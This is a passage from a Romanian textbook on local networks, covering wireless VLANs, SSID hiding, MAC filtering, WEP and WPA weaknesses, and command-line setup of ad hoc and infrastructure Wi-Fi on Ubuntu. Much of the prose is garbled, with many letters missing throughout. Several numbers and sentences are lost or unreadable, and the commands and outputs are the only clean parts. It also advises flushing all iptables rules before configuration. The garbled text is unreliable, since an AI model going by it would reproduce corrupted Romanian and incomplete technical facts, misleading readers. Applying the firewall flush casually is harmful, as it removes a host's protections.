lie ţilo o ili. A easta pe t u ă fie a e AP ofe ă lie ţilo lui pâ ă la M ps, de i î total
ele vor constitui o eţea wireless u o a dă de M ps = 162 Mbps.
5.1.6.5 VLAN-uri
VLAN-u ile se o figu ează î ge e al pe s it hu i pe t u a putea o ţi e ai ulte
domenii de broadcast. Aceste VLAN-u i se pot e ti de şi î eţelele wireless prin maparea unui
SSID diferit pentru fiecare VLAN dorit . Prin aceasta ope aţie se o ţi e o i tualiza e a access
point-ului, a esta apă â d a ai ulte eţele dife ite. “i gu a li ita e este a toate eţele
t e uie să fu ţio eze pe a elaşi a al ă i u t a s iţăto wireless nu poate genera trafic pe
mai multe canale în acelaşi ti p. Bi eî ţeles ă u o i e AP a putea să supo te VLAN-uri. De
fapt, singurul lucru de care are nevoie AP-ul, este suport pentru protocolul 802.1q, pentru a
putea realiza un trunk1 cu switchul în care este legat. Unele AP-u i supo tă hia si tehnici de
QoS (802.1p2 pe t u a putea lasifi a i po ta ţa t afi ului di fie a e VLAN.
Un motiv important pentru care s-a do i e iste ţa VLAN-urilor pe AP-uri este separarea
eţelei wireless după dife ite p i ilegii de se u itate guest, user, VIP).
5-9: VLAN-uri
1
A se vedea capitolul 2
2
http://en.wikipedia.org/wiki/802.1p
175 | W i r e l e s s
5.1.7 Securitatea wireless
5.1.7.1 SSID broadcast

Fie a e eţea wireless este ide tifi ată p i t -u u e: aşa u itul SSID (Service Set
Identifier . Pe t u a o staţie să se poată aso ia la o eţea, ea t e uie să u oas ă SSID-ul
eţelei espe ti e. Î od o al, access point-u ile a u ţă pe iodi SSID-ul eţelei pe t u a o
staţie să e ifi e da ă u u a do eşte să se aso ieze eţelei espe ti e. A est p o es de
a u ţa e se u eşte ““ID broadcast. Cu oaşte ea SSID-ului de ăt e o staţie ata atoa e poate
fi un risc de securitate. Toate AP-u ile ofe ă o seta e e pe ite eli i a ea ““ID broadcast,
forţâ d astfel o aso ie e a ti ă staţia t e uie să spe ifi e a ual eţeaua la a e do eşte să se
conecteze).
Deşi eli i a ea ““ID broadcast este o side ată î u ele do u e taţii a fii d o ăsu a
de se u itate, a eastă afi aţie este e o ată. P oto olul . o ţi e î spe ifi aţii esaje
speciale numite beacons. A este esaje su t folosite de ăt e AP a u ecanism de
e ifi a e pe iodi ă a faptului ă o staţie este î ă a ti ă. Beacon-u ile su t ăzute de toate
staţiile di eţea şi o ţi SSID-ul eţelei. De i eli i a ea ““ID broadcast este o ăsu a
o plet i utilă de se u itate, odată e SSID-ul poate fi aflat de atacator din aceste beacon-uri
ce nu pot fi dezactivate.
T e uie spus totuşi ă e istă u ele oute e a e pe it eli i a ea o pletă a SSID-ului,
atât din mesajele de broadcast, ât şi di beacon-uri.
5.1.7.2 Filtrare azată pe adresa MAC

O etodă foa te des folosită î eţelele i i este MAC Filtering. Aceasta presupune
configurarea AP-ului astfel î ât să pe ită a esul doa a u ito i te feţe wireless, pe baza
ad esei MAC. “p e e e plu, da ă î eţeaua oast ă eţi să o e taţi doa a eleaşi i i staţii,
puteţi o figu a AP-ul să a epte doa i te feţele a e au u a di t e ele ad ese MAC. Nici
a eastă a o da e u e ult ai sigu ă: ad esele MAC acceptate pot fi aflate prin captura
t afi ului î t e ele şi AP. Apoi u ha ke poate s hi a ad esa MAC a i te feţei p op ii u u ul
dintre MAC-urile capturate.
Metodele p eze tate ai sus, deşi u su t foa te sigu e, su t foa te des folosite. A easta
u di lipsa de u oşti ţe sau ig o a ţă. Câ d i e o a desp e se u itate, î ai tea luă ii
o i ă ei ăsu i, t e uie ealizată o e alua e a is ului. Da ă a eţi de ealizat o eţea wireless
într-o e t ală u lea ă, atu i e ită asigu at u a i de se u itate. Da ă î să a eţi o eţea
a asă şi p otejaţi o o e iu e I te et, atu i ăsu ile u au de e sa fie foarte drastice.
5.1.7.3 Securitatea WEP

P oto olul . i lude şi o spe ifi aţie pe t u u e a is de se u iza e ai a a sat:
WEP (Wired Equivalent Privacy . După u spu e şi u ele, ep ezi tă u e a is
specializat e, teo eti , a t e ui să o fe e u ivel destul de ridicat de securitate.
WEP asigu ă ipta ea t afi ului di eţea p i t -u algo it de ipta e si et i ă de u it
‘C . Pe t u a se u iza o eţea p i a est e a is , o heie spe ifi ă eţelei u este a elaşi
lu u u ““ID este u os ută de ăt e toate odu ile ă o a li se pe ite aso ie ea. Î
o e tul î a e o staţie do eşte să se aso ieze AP-ului, a esta e ifi ă da ă staţia u oaşte
heia se etă p i t -o se e ţă de challenge: t i ite u esaj aleato pe a e staţia t e uie să-
l returneze criptat. AP-ul a de ipta apoi esajul şi a e ifi a da ă este hia esajul pe a e
el l-a t i is i iţial. A est pas supli e ta la aso ie e poa tă u ele de aute tifi a e. Di a est
o e t staţia poate o u i a î eţea, î să ad ele o u i ate or fi toate criptate cu cheia
eţelei.
176 | ‘ e ţ e l e L o a l e
Di efe i i e, o i ât de pute i ă a fi ipta ea şi o i ât a fi heia de lu gă, faptul ă

a easta este stati ă este o a e ul e a ilitate. U ha ke poate i te epta se e ţa de
aute tifi a e şi, u os â d algo it ul, a î e a să afle heia. Di o e t e a easta se a
s hi a foa te a , a e foa te ult ti p la dispoziţie să o fa ă.
Fii d o a de teh ologie elati e e tă, s-au fă ut ulte studii î legătu ă u pute ea
WEP-ului, descoperindu-se astfel o serie de ul e a ilităţi. Totul a ul i at u spa ge ea
algo it ului î , ia a u e istă pu li ate pe I te et apli aţii a e pot des ope i foa te
epede heia WEP pe aza pa hetelo i te eptate di eţea.
5.1.7.4 Securitatea WPA/WPA2

Wi-Fi Alliance este un conso ţiu fo at di peste di t e ele ai a i o pa ii di
do e iul IT, a â d a s op p o o a ea şi dez olta ea teh ologiilo wireless. În 2003 Wi-Fi
Alliance a p opus u ou p oto ol pe t u se u itatea eţelelo : WPA Wi-Fi Protected Access)
ce a devenit standardul de securitate pentru majoritatea echipamentelor 802.11.
WPA i ple e tează u su set al spe ifi aţiilo de se u itate wireless prezente în
sta da dul . i şi ep ezi tă ăspu sul i dust iei la şo ul spa ge ii WEP-ului, venind cu
soluţii pe t u ele ai i po ta te ul e a ilităţi des ope ite a estuia di u ă. Cea ai
i po ta tă î u ătăţi e adusă WPA-ului este folosi ea u ui p oto ol de s hi a e di a i ă a
cheii de criptare pe durata conexiunii: TKIP (Temporary Key Integrity Protocol). Acesta i e să
ezol e p o le a WEP legată de posi ilitatea fa ilă de e upe a e a heii. WPA fu ţio ează
î două odu i: personal şi enterprise.
În prezent, WPA a ajuns la cea de-a doua versiune. În iunie 2004 IEEE a omologat
sta da dul . i, e it să a e deze sta da dul . u p i i e la se u itatea î eţelele
wireless. WPA i ple e tează setul de spe ifi aţii o ligato ii p eze t î sta da dul . i,
păst â d şi o pati ilitatea u p i a e siu e a p oto olului WPA . ‘e o a dă ile a tuale î
p i i ţa se u ităţii eţelelo fă ă fi su t folosi ea u ui siste WPA Pe so al AES PreShared
Key pe t u utilizato ii as i i şi WPA E te p ise î p eu ă u u se e ‘ADIU“ pe t u
mediul de afaceri.
Î pofida e iste ţei a esto teh i i a a sate de se u itate, un studiu efectuat în iunie 2007
î Lo d a, o aşul u el ai a e u ă de eţele fă ă fi di lu e de pu te de a es ,
a a ătat ă % di eţelele fă ă fi u a eau i ple e tat i iu fel de siste de p ote ţie a
eţelei. Di t e ele a e ofe eau un oarecare nivel de securitate, 48% erau protejate cu WEP.
Ate ţie! Da ă pa ola pe a e o folosiţi pe t u se u iza ea eţelei este sla ă, u o tează e
algo it sau e sta da d de se u itatea folosiţi: eţeaua a putea fi spa tă p i t -un atac de tip
ute fo e! De a eea se e o a dă iti ea u ui ghid 1 e p ezi tă ele ai u e p a ti i î
alege ea u ei pa ole, î ai te de a o figu a se u itatea u ei eţele.
5.2 Configurarea unei reţele wireless în Linux – configurări de bază

5.2.1 De ce wireless pe Linux?
Pe parcursul ultimilor 5 ani, s-a i estit destul de ult efo t atât di pa tea o u ităţii ât
şi di pa tea a dife ite o ga izaţii Linux Foundation, WiFi Alliance, DELL pe t u a î u ătăţii
şi a popula iza Li u a o platfo ă o ilă pe t u utilizato ul final. Prezentându-se în lumea
utiliză ii siste elo de ope a e a o platfo ă u p ete ţii, odată u apa iţia e oii de
o ilitate pe piaţa IT, Li u a o ţi ut supo t pe t u sti a . şi a păt u s şi î lu ea
dispozitivelor embedded, dezvoltând platfo e î p eu ă u Te as I st u e ts şi Intel.
1
http://www.ou.edu/committees/itc/policy/Guidelines_for_Passwords.html
177 | W i r e l e s s
În prezent, s-au fă ut p og ese eale pe t u ofe i ea u ui supo t ât ai u pe t u

drivere wireless, astfel ă, î p eze t, Li u ofe ă atât soluţii de eţele adhoc, i f ast u tu ă de
di e siu i i i şi edii ât şi soluţii enterprise.
U ul di p oie tele i te esa te a e îşi p opu e să ă eas ă ga a de supo t wireless în
Linux este NDISwrapper1. Pe t u ă ulţi p odu ăto i u eli e ează şi d i e e Li u pe t u
plă ile wireless livrate, NDISwrapper face posibilă i stala ea de d i e e wireless scrise în
Wi do s API pe o platfo ă Li u . Mai ulte i fo aţii se pot găsi pe pagi a e a
proiectului.
5.2.2 Configurări de bază

“e o p eze ta î o ti ua e, atât odul de o figu a e ale u ei eţele wireless adhoc şi
infrast u tu ă, ât şi odalităţi de se u iza e pe t u a estea. Deşi U u tu ofe ă supo t pe t u
o figu a ea î ediul g afi , pe t u e e plele de ai jos se a p efe ă utiliza ea li ie de
o a dă. Moti ul pe t u a eastă alege e este lipsa de supo t pe te e lung pentru clientul
de wireless pe a e U u tu îl o ţi e şi i sta ilitatea pe a e GUI-ul o are pentru unele drivere
wireless. Folosi d li ia de o a dă, e istă sigu a ţa u ei soluţii i depe de te de platfo ă şi
a e a putea fi apli ată pe o i e dist i uţie de Li u
Co figu a ea u ei eţele atât ad hoc cât şi i f ast u tu ă se poate fa e î două odu i:
 temporar - p i i te ediul u o o e zi e se apli ă î o e tul î a e su t i t oduse. Ele
afe tează software-ul e ulează î ‘AM, de i o figu ă ile u o fi pe siste te la u ătoa ea
pornire a sistemului.
 permanent - p i edita ea fişie ului de o figu a e /etc/network/interfaces şi
restartarea se i iului de eţea. Fişie ul este î ă at la fie a e epo i e a siste ului.
5.2.2.1 Pregătirea i terfeței de rețea

U pa het ese ţial pe t u a est apitol, a e a fi folosit î toate o figu aţiile p eze tate,
este wireless-tools2. Acesta este inclus în Ubuntu 8.04, iar în cazul unei versiuni mai vechi
de U u tu se poate i stala uşo folosi d utilita ul apt:
waters@myr:-$ sudo apt-get install wireless-tools
A est pa het o ţi e u ătoa ele utilita e:

 iwconfig este u utilita ase ă ăto ifconfig u ajuto ul ă uia se pot o figu a
pa a et ii de ază ai u ei legătu i wireless.
 iwlist ofe ă posi ilitatea de s a a e î li ie de o a dă pe t u găsi ea eţelelo wireless.
 iwevent pe ite o ito iza ea i te feţei wireless şi apo ta ea u ui e e i e t de aso ie e
u o eţea wireless sau î heie ea u ei s a ă i.
 iwspy afişează pa a et ii de pute e şi de alitate ai legăturii wireless
 iwpriv pe ite odifi a ea u o pa a et ii spe ifi i fie ă ui driver wireless
Î ulte azu i, difi ultatea ealiză ii u ei eţele wireless pe Li u u o stă î

o figu ă ile p op iu-zise, i î dife ite i o pati ilităţi u d i e e, u dife ite apli aţii a ti ate
î od i pli it î U u tu, sau hia u plă i wireless pe t u a e u e istă î ă supo t î
Ubuntu. Acest subcapitol a fost creat pentru a elimina unele probleme ce ar putea îngreuna
ealiza ea u ei eţele wireless sau ar putea împiedi a seta ea u o pa a et ii de ază.
“e o pa u ge âţi a paşi p e e găto i, e o asigu a u a fu ţio a e a o figu aţiilo
din acest capitol.
1
http://ndiswrapper.sourceforge.net/joomla/
2
http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Tools.html
178 | ‘ e ţ e l e L o a l e
1. Op i ea i te feţei Ethernet.
Deşi u este u az des î tâl it, u ele d i e e wireless nu permit configu a ea eţelei da ă
dete tează o e ti itate pe o legătu a Ethernet, de i î ai te de a o figu a eţeaua ad hoc
trebuie decuplat cablul Ethernet.
2. Oprirea firewall-ului
T e uie asigu at ă u a eţi niciun firewall ( precum firestarter , i stalat şi ulâ d în
siste . Î U u tu e istă u firewall implicit numit iptables. Pe t u a fi sigu i ă eţeaua u a
fi lo ată de o egulă i t odusă a ide tal sau o egulă e lo hează ai ult de ât a t e ui
să o fa ă, se e o a dă şte ge ea ta elei de filt a e a iptables astfel:
waters@myr:-$ sudo iptables -F
3. Oprirea NetworkManager-ului
Apli aţia di U u tu e se o upă u ope aţiile lie tului de wireless se u eşte
NetworkManager. A easta a t e ui op ită î ai te de a fa e o i e o figu a e. Op i ea
programului se poate face prin apelarea scriptului numit 25NetworkManager cu parametrul
stop.
waters@myr:~$ sudo /etc/dbus-1/event.d/25NetworkManager stop
* Stopping network connection manager NetworkManager [ OK ]
4. Co pati ilităţii ha d a e doar pentru realizarea unei eţele ad hoc)

“e e o a dă e ifi a ea pe lista ofi ială de pe pagi a e U u tu1 da ă pla a wireless
supo tă odul ad hoc pe Ubuntu.
5. Verificarea driverului
Este posi il să apa ă p o le e u driver-ul i stalat i pli it de U u tu sau e u oaşte ea
plă ii wireless de ăt e siste ul de ope a e. Pe t u a putea e ifi a dete ta ea plă ii wireless,
se vor folosi comenzile:
 lspci pe t u plă ile wireless e fu ţio ează pe po t PCI.
 lsusb pe t u plă ile wireless e fu ţio ează pe po t U“B adaptoa e wireless).
waters@myr:-$ lspci
[...]
04:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection
(rev 02)
Da ă pla a wireless nu apare în output, cel mai probabil Ubuntu nu a avut integrat un
d i e pe t u pla a de eţea. Î a est az t e uie ăutat pe site-ul p odu ăto ului u d i e
wireless, ia da ă u e istă d i e pe t u Li u , puteţi folosi soluţia NDISwrapper pentru a
instala un driver de Windows.
5.2.2.2 Co figurarea u ei rețele ad hoc

Notă: toate o figu ă ile e u ează t e uie ealizate pe toate staţiile di eţeaua ad hoc.
După u s-a precizat, o figu a ea u ei staţii se poate fa e te po a sau pe a e t. “e
o u ă ia ele a o dă i î ele e u ează.
5.2.2.2.1 Co figurarea te porară

Pe t u î eput, t e uie aflat u ele i te feţei wireless de eţea. “e a folosi o a da
iwconfig fă ă i iu pa a et u pe t u a afişa i te feţele a ti e î siste .
waters@myr:~$ iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
1
https://help.ubuntu.com/community/WifiDocs/WirelessCardsSupported
179 | W i r e l e s s
wlan0 IEEE 802.11g ESSID:"" Nickname:""

Mode: auto Frequency:2.412 GHz Cell: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2346 B
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Notă: sintaxa comenzii iwconfig este: iwconfig <i te faţa_wireless> <parametru_ eţea>
<valoarea_parametrului>
Da ă i te faţa u apa e î ezultatul o e zii iwconfig, numele cu care sistemul
ide tifi ă a eastă o po e tă wifi0, wlan0, wireless0) poate fi aflat din consultarea
fişie ului /proc/net/dev.
waters@myr:~$ cat /proc/net/dev
Inter-| Receive | Transmit
face |bytes packets errs drop fifo frame compressed multicast|bytes packets errs
drop fifo colls carrier compressed
lo: 14016 184 0 0 0 0 0 0 14016 184 0 0 0 0 0 0
eth1: 1461444 10683 0 0 0 0 0 0 1034216 9140 0 0 0 0 0 0
U ătoa ele o e zi o t e ui i t oduse în ordinea în care sunt listate mai jos. Trebuie
a ut g ijă u se e ţie ea o e zilo ă i u ele o e zi pot afe ta setă ile ealizate a te io .
Pe t u a e ita p o le e de o figu a e e a putea apă ea di auza driver-ului, se va opri
i te faţa wireless î ai te de apli a ea pa a et ilo de eţea:
waters@myr:~$ sudo ifconfig wlan0 down
“pe ifi a ea tipului de eţea wireless se face cu ajutorul parametrului mode al comenzii
iwconfig.
waters@myr:-$ sudo iwconfig wlan0 mode adhoc
Parametrul mode are cea mai a e p io itate î o figu aţie şi t e uie i t odus
î totdeau a p i ul î se e ţa de o e zi de o figu a e. Valo ile sale ele a te su t:
 master - a eastă aloa e dese ează i te faţa a fii d u a de AP. “e a folosi u ai da ă se
do eşte ealiza ea u ui se e Li u a e să poată fu ţio a a Access Point. “e e o a dă
consultarea WiFi-Docs1 pe t u posi ilitatea setă ii plă ii î a est od.
 managed – a est od se foloseşte â d se do eşte o e ta ea la u AP î t -o eţea tip
i f ast u tu ă
 ad hoc – spe ifi ă opţiu ea u ei eţele ad hoc
În continuare, trebuie configurat SSID-ul eţelei ad hoc pe fie a e di t e staţii.

waters@myr:~$ sudo iwconfig wlan0 essid my_network
Pentru unele adaptoare wireless este e esa ă şi o figu a ea u ui a al de o u i are.

waters@myr:~$ sudo iwconfig wlan0 channel 1
Într-o eţea adhoc se pot folosi şi alţi pa a et ii opţio ali ai o e zii iwconfig pentru a
seta bit-rate-ul, puterea de transmisie sau parametrii de securitate.
Pâ ă la a est pas, a fost o figu ată o eţea wireless e ofe ă o e ti itate de i el .
Pentru a putea asigura comunicare de nivel 7 trebuie o figu aţi, mai întâi, parametrii de
i el : ad esele IP de asigu a ea o e ti ităţii - se o upa sti a TCP/IP şi sistemul de
operare).
1
https://help.ubuntu.com/community/WifiDocs/MasterMode
180 | ‘ e ţ e l e L o a l e
Notă: În general î lu ea eţelelo , ad i ist ato ul de eţea se o upă u o figu ă ile de

i el , , şi ; ai puţi u i elul apli aţie.
Setarea adresei IP se face folosind comanda ifconfig:
waters@myr:~$ sudo ifconfig wlan0 192.168.1.1 netmask 255.255.255.0 broadcast
192.168.1.255 up
Ate ţie! toate staţiile di eţeaua ad hoc t e uie să se afle î a elaşi su et pe t u a

eţeaua să poată fu ţio a o e t. Se poate folosi utilitarul ping pe t u e ifi a ea legătu ii de
i el şi ““H pe t u testa ea legătu ii de i el 7.
5.2.2.2.2 Co figurarea per a e tă

După u s-a ai p e izat, pe t u a ealiza o o figu aţie pe a e tă t e uie editat
fişie ul te t /etc/network/interfaces u pa a et ii eţelei.
Notă: î ge e al pe Li u toate o figu ă ile pe a e te se fa î fişie e te t. Chia şi
atunci când se folosesc utilitare în mod grafic, a estea ope ează odifi ă i î fişie e te t.
Deşi si ta a este puţi s hi ată, se o figu ează a eiaşi pa a et ii p e u î azul
o figu ă ii te po a e:
auto wlan0
iface wlan0 inet static
wireless-mode adhoc
wireless-channel 4
wireless-essid my_network
address 192.168.0.2
netmask 255.255.255.0
Ate ţie! o di ea pa a et ilo de o figu a e o tează.

Pe t u a putea testa apli a ea o e ta a pa a et ilo i t oduşi î fişie ul de o figu a e,
trebuie fo ţată ei te p eta ea fişie ului /etc/network/interfaces. Acest lucru se poate
face prin repornirea se i iului de eţea:
waters@myr:~$ sudo /etc/init.d/networking restart
Rezultatul comenzii iwconfig a efle ta pa a et ii apli aţi:

waters@myr:~$ iwconfig wlan0
wlan0 IEEE 802.11g ESSID:"my_network" Nickname:""
Mode:Adhoc Frequency:2.427 GHz Cell: 00:19:E0:84:DD:4A
Bit Rate=54 Mb/s Tx-Power=27 dBm
Link Quality=85/100 Signal level=-48 dBm Noise level=-82 dBm
5.2.2.3 Co figurarea u ei rețele de tip i frastru tură

Ca şi î azul eţelei ad hoc configurarea se poate face temporar, prin comenzi iwconfig,
sau pe a e t, p i edita ea fişie ului de o figu a e. Pe t u a ele tipu i, o t e ui ai
întâi parcurse etapele de pregăti e ale i te feţei de eţea des ise anterior.
181 | W i r e l e s s
5.2.2.3.1 Co figurarea te porară

Pe t u o eţea de tip i f ast u tu ă a t e ui setat odul managed, SSID-ul eţelei la a e
se do eşte o e ta ea şi a alul de o u i aţie folosit de eţea. SSID-ul şi a alul de
o u i aţie ide tifi ă î od u i o eţea wireless, de i t e uie setate pe lie t la a eeaşi
aloa e la a e au fost o figu ate şi pe AP.
Da ă se do eşte apa te e ţa la o eţea fă ă fi , t e uie aflat u a SSID-ul eţelei la a e
t e uie fă ută aso ie ea. Pachetul wireless-tools include un utilitar numit iwlist, folosit
pe t u s a a ea ediului şi afla ea SSID-ului eţelelo a e se află î aza e epto ului wireless
local. Pentru a porni scanarea, se va apela comanda iwlist astfel:
waters@myr:~$ sudo iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 - Address: 00:1B:FC:60:D7:8D
ESSID:"YoGi"
Mode:Master
Channel:1
Frequency:2.412 GHz (Channel 1)
Quality=71/100 Signal level=-63 dBm Noise level=-75 dBm
Encryption key:on
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s ; 54 Mb/s
Extra:tsf=000000ca49a2cfbc
Cell 02 - Address: 00:19:E0:84:DD:4A
ESSID:"guest"
Mode:Master
Channel:11
Frequency:2.412 GHz (Channel 1)
Quality=79/100 Signal level=-55 dBm Noise level=-75 dBm
Encryption key:off
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
Extra:tsf=000000000190900b
A alizâ d ezultatul o e zii, se poate o se a e iste ţa a două eţele de tip

i f ast u tu ă ide tifi ate astfel după pa a et ul mode Master) la care se poate încerca
conectarea:
 ‘eţeaua u SSID-ul YoGi
o foloseşte f e e ţa de . Ghz şi a alul
o Ad esa MAC p eze tă î di e ti e Cell: este ad esa fizi ă a AP-ului şi poa tă u ele de B““ID
(Basic Service Set Identifier) într-o eţea i f ast u tu ă.
o Analizând bit rate-ul posibil pe care AP-ul îl ofe ă, se poate o luzio a faptul ă AP-ul foloseşte
p oto olul . g deoa e e . , deşi fu ţio ează la a eeaşi f e e ţă, u a e o ată teo eti ă
de fu ţio a e ai are de 11 Mbps
foloseşte aute tifi a e şi ipta e pe aza p oto olului WPA TKIP hei s hi ate î od di a i .

o
‘eţeaua u SSID-ul Guest
o foloseşte f e e ţa de . Ghz şi a alul
o Ad esa MAC p eze tă î di e ti e Cell: este ad esa fizi ă a AP-ului şi poa tă u ele de B““ID
(Basic Service Set Identifier) într-o eţea i f ast u tu ă.
o U ă i d ezultatul atei posi ile afişate it ate , se poate ide tifi a eţeaua a fii d .
iteză a i ă M ps
o eţeaua u foloseşte aso ie e se u izată, fii d de tip OPEN E ptio off . Ate ţie, a est lu u u
î sea a a se a putea ealiza î totdeau a aso ie ea la eţea. Chia da a eţeaua apa e a fii d
OPEN la s a a e, pot fi i ple e tate politi i de filt a e după ad esa MAC pe AP, a e să pe ită
doar anu ito staţii să se aso ieze eţelei.
“e a o figu a î o ti ua e aso ie ea la eţeaua guest prin:
 op i ea te po a ă a i te feţei de eţea ât ti p se apli ă oile o figu aţii
 setarea modului managed
 setarea SSID-ului şi a alului o espu zăto eţelei guest
 des hide ea i te feţei wireless
182 | ‘ e ţ e l e L o a l e
Co e zile pe t u efe tua ea ope aţiilo de ai sus su t după u u ează:

waters@myr:-$ sudo ifconfig wlan0 down
waters@myr:-$ sudo iwconfig wlan0 mode managed
waters@myr:-$ sudo iwconfig wlan0 essid guest
waters@myr:-$ sudo iwconfig wlan0 channel 11
waters@myr:-$ sudo ifconfig wlan0 up
Co figu a ea de i el este o pletă şi se poate e ifi a p i iwconfig:

wlan0 IEEE 802.11g ESSID:"guest" Nickname:""

Mode:Managed Frequency:2.462 GHz Access Point: 00:19:E0:84:DD:4A
O servaţie: deoa e e î ă u s-a ealizat aso ie ea la eţeaua . u ““ID guest, it-

rate-ul lie tului este î ă setat pe aloa ea i pli ită de M ps. Cu sta da dul . g
este el ai î tâl it î eţele fă ă fi , ajo itatea lie ţilo o a ea caracteristicile implicite ale
acestui protocol.
Mai ă â e de o figu at doa asig a ea u ui IP pe i te faţa wireless pentru a putea
o u i a la i el î eţea. U a di dife e ţele i po ta te di t e o eţea ad hoc şi u a
i f ast u tu ă este u a de ad i istrare. Într-o eţea ad hoc u e istă ad i ist ato şi de a eea
fie a e utilizato t e uie să seteze IP-ul stati pe i te faţa de eţea, a â d g ijă a toate IP-urile
să se afle î a elaşi subnet. ‘eţeaua de tip i f ast u tu ă a p esupu e u i i de
admi ist a e şi ai ult, e iste ţa u ei etode e t alizate de seta e a ad eselo IP pe
fie a e staţie, fă ă i te e ţia utilizato ilo : u se e DHCP. Î azul î a e AP-ul ofe ă
fu ţio alitatea u ui se e DHCP, i te alul di a e se e ul DHCP ofe ă adrese IP poate fi
o figu at di i te faţa g afi a a AP-ului.
5-10: configurare serverului DHCP
Deci, se poate finaliza configurarea clientului wireless prin efectuarea unei cereri DHCP pe
i te faţa wlan0 cu ajutorul comenzii dhclient:
waters@myr:~$ sudo dhclient wlan0

Internet Systems Consortium DHCP Client V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/wlan0/00:18:de:b9:ac:da
Sending on LPF/wlan0/00:18:de:b9:ac:da
Sending on Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 5
DHCPOFFER of 192.168.2.105 from 192.168.2.1
DHCPREQUEST of 192.168.2.105 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.2.105 from 192.168.2.1
bound to 192.168.2.105 -- renewal in 48000 seconds.
183 | W i r e l e s s
5.2.2.3.2 Co figurarea per a e tă

Pe t u o o figu aţie pe siste tă, i t odu e di e ti ele spe ifi ate a te io , î fişie ul
/etc/network/interfaces
auto wlan0
iface wlan0 inet dhcp
wireless-mode managed
wireless-channel 11
wireless-essid guest
P i ealiza ea epo i ii se i iului de eţea, se o apli a pa a et ii mode, channel si

SSID, iar apoi se va face o cerere DHCP pentru configurarea parametrilor de nivel 3.
waters@myr:~$ sudo /etc/init.d/networking restart
* Reconfiguring network interfaces...
Internet Systems Consortium DHCP Client V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/wlan0/00:18:de:b9:ac:da
Sending on LPF/wlan0/00:18:de:b9:ac:da
Sending on Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 3
DHCPOFFER of 192.168.2.107 from 192.168.2.1
DHCPREQUEST of 192.168.2.107 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.2.107 from 192.168.2.1
bound to 192.168.2.107 -- renewal in 53306 seconds.
[ OK ]
5.2.2.3.3 Testarea reţelei

În co ti ua e se a a aliza o p o le ă de o e ti itate e poate apă ea după o figu a ea
u ei eţele de tip i f ast u tu ă. “e a p esupu e ă ad i ist ato ul efe tuează u ping ăt e
adresa www.google.com, iar comanda întoarce mesajul ICMP: Destination Unreachable. În
od e ide t e istă o p o le a de o e ti itate î eţea. Pe t u a o ezol a, se o pa u ge
u ăto ii paşi:
1. Ve ifi a ea o e tă a aso ie ii la eţeaua .
După aso ie e se poate e ifi a si o iza ea pa a et ilo î t e lie tul wireless şi eţeaua
802.11b, printre care adresa MAC a AP-ului cu care s-a fă ut aso ie ea şi ata de t a sfe e a
fost ego iată la a i ul posi il al eţelei: Mp s.
wlan0 IEEE 802.11g ESSID:"guest" Nickname:""
Mode:Managed Frequency:2.462 GHz Access Point: 00:19:E0:84:DD:4A
2. Ve ifi a ea o e ti ităţii la gateway.

O e e ea DHCP efe tuată o figu ează ai ult de ât ad esa IP pe i te faţa wireless;
a easta i t odu e şi o uta i pli ită ută default ăt e ad esa IP a gateway-ului şi ofe ă
staţiei şi o ad esă alidă a u ui se e DN“. E iste ţa utei i pli ite se e ifi ă p i o a da
route:
waters@myr:~$ route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
0.0.0.0 192.168.2.1 0.0.0.0 UG 100 0 0 wlan0
‘ezultatul o e zii o ţi e o ută i pli ită ăt e ad esa . . . . După e s-a aflat

adresa IP a gateway-ului, se poate testa conectivitatea cu acesta prin comanda ping:
184 | ‘ e ţ e l e L o a l e
waters@myr:~$ ping 192.168.2.1 -c 3

PING 192.168.2.1 (192.168.2.1) 56(84) bytes of data.
64 bytes from 192.168.2.1: icmp_seq=1 ttl=64 time=1.75 ms
--- 192.168.2.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 1.640/1.865/2.199/0.240 ms
3. Ve ifi a ea e iste ţei u ei ad ese IP pe t u se e ul de u e DN“

Da ă se aju ge î a est pas, se poate o side a a a esul î eţeaua lo ală este lipsit de
p o le e, odată e se poate da ping în adresa de gateway. Singurul lucru ce ar putea cauza
proble e de o e ti itate î e te io este p oto olul DN“. Pe t u a e ifi a da ă se e ul
DHCP a ofe it o ad esă pe t u u se e de u e, se a o sulta fişie ul /etc/resolv.conf:
waters@myr:~$ cat /etc/resolv.conf
nameserver 82.76.253.115
Da ă e istă u se e de u e o figu at, p o le a eţelei pă ăseşte espo sa ilitatea

ad i ist ato ul şi t e e de pa tea I“P-ului. Pasul u ăto pe t u ezol a ea p o le ei este
contactarea ISP-ului şi apo ta ea p o le ei.
5.3 Configurarea unei reţele wireless în Linux - configurări avansate

5.3.1 Partajarea unei conexiuni la Internet într-o reţea ad hoc
Una dintre o figu aţiile e se poate î tâl i des î fu ţio a ea eţelelo atât pe fi ât şi
fă ă fi este pa taja ea u ei o e iu i la I te et. “ e a iul a esta p esupu e el puţi două
PC-uri aflate într-o eţea ad hoc fă ă fi sau o eţea Ethernet pe fir.
5-11: Partajarea unei conexiuni la Internet
